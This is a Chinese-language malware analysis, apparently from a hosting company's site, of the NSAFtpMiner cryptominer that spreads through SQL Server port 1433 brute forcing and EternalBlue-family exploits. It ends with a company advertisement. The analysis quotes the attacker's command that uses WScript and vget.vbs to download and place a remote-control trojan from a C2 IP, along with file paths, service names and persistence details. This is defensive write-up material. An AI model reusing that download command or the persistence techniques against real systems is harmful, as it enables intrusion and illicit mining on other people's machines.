中毒表現:
1,cpu跑到100%,服務器非常卡,基本操作不了,所有提供服務無法正常運行。
2,進程中有win1ogins.exe,中間是數字1
不是字母l.描述是cpu挖礦。右鍵無法打開文件位置。
3,斷網情況下無法挖礦,CPU占用回下來。
使用360掃描殺毒,可以發現釋放文件help.dll
原理:黑客通過1433端口爆破入侵SQL
Server服務器,再植入遠程控制木馬并安裝為系統服務,然后利用遠程控制木馬進一步加載挖礦木馬進行挖礦。
NSAFtpMiner攻擊流程
1433爆破手礦工(NSAFtpMiner)有如下特點:
1.利用密碼字典爆破1433端口登錄;
2.木馬偽裝成系統服務,COPY自身到c:\windows\svchost.exe,創建服務“Server
Remote”;
3.利用NSA武器庫工具包掃描入侵內網開放445/139端口的計算機;
4.使用了NSA武器中的多個工具包Eternalblue(永恒之藍)、Doubleplsar(雙脈沖星)、EternalChampion(永恒冠軍)、Eternalromance(永恒浪漫)、Esteemaudit(RDP漏洞攻擊);
5.遠程控制木馬創建“FTP系統核心服務”,提供FTP服務,供內網其他被入侵的電腦進行病毒庫更新;
6.下載挖礦程序在局域網組網挖取門羅幣。
黑客針對1433端口爆破成功后在受害機器執行命令:
“C:\Windows\System32\WScript.exe”
“C:\ProgramData\vget.vbs” hxxp://221.229.204.120:7423/clem.exe
C:/ProgramData/clem.exe
將遠程控制木馬植入。
clem.exe運行后拷貝自身到C:\windows\svchost.exe,并創建服務“Server
Remote”。
連接C2地址221.229.204.120:
遠程控制木馬clem.exe接收指令下載NSA攻擊模塊主程序ru.exe,ru.exe運行后在C:\Program
Files\Windowsd 釋放72個子文件。
黑客攻擊時先關閉防火墻,然后啟動Fileftp.exe掃描內網機器的445/139端口,如果端口處于打開狀態則利用多個NSA武器工具(Eternalblue等)對目標機器進行攻擊。若攻擊成功,則根據不同系統版本在受害機器上執行payload(x86/x64.dll),x86/x64.dll執行后釋放出runsum.exe并安裝執行,runsum.exe功能同最初的遠程控制模塊clem.exe相同,接收指令下載挖礦模塊和NSA攻擊模塊進行挖礦攻擊和繼續感染。
使用kill.bat、Pkill.dll對攻擊進程進行清除。
遠程控制木馬clem.exe下載挖礦模塊xxs.exe,xxs.exe運行后釋放help.dll到C:\Windows\Fonts\sysIntl。
help.dll釋放礦機程序win1ogins.exe到以下目錄:
C:\Windows\Help\
C:\Windows\PLA\system\
C:\Windows\Fonts\system(x64)\
C:\Windows\Fonts\system(x86)\
C:\Windwos\dell\
win1ogins.exe采用開源挖礦程序xmrig編譯 啟動礦機程序挖礦門羅幣
河南億恩科技股份有限公司(www.vbseamall.com)始創于2000年,專注服務器托管租用,是國家工信部認定的綜合電信服務運營商。億恩為近五十萬的用戶提供服務器托管、服務器租用、機柜租用、云服務器、網站建設、網站托管等網絡基礎服務,另有網總管、名片俠網絡推廣服務,使得客戶不斷的獲得更大的收益。
服務器/云主機 24小時售后服務電話:
0371-60135900
虛擬主機/智能建站 24小時售后服務電話:
0371-55621053
網絡版權侵權舉報電話:
0371-60135995
服務熱線:
0371-60135900
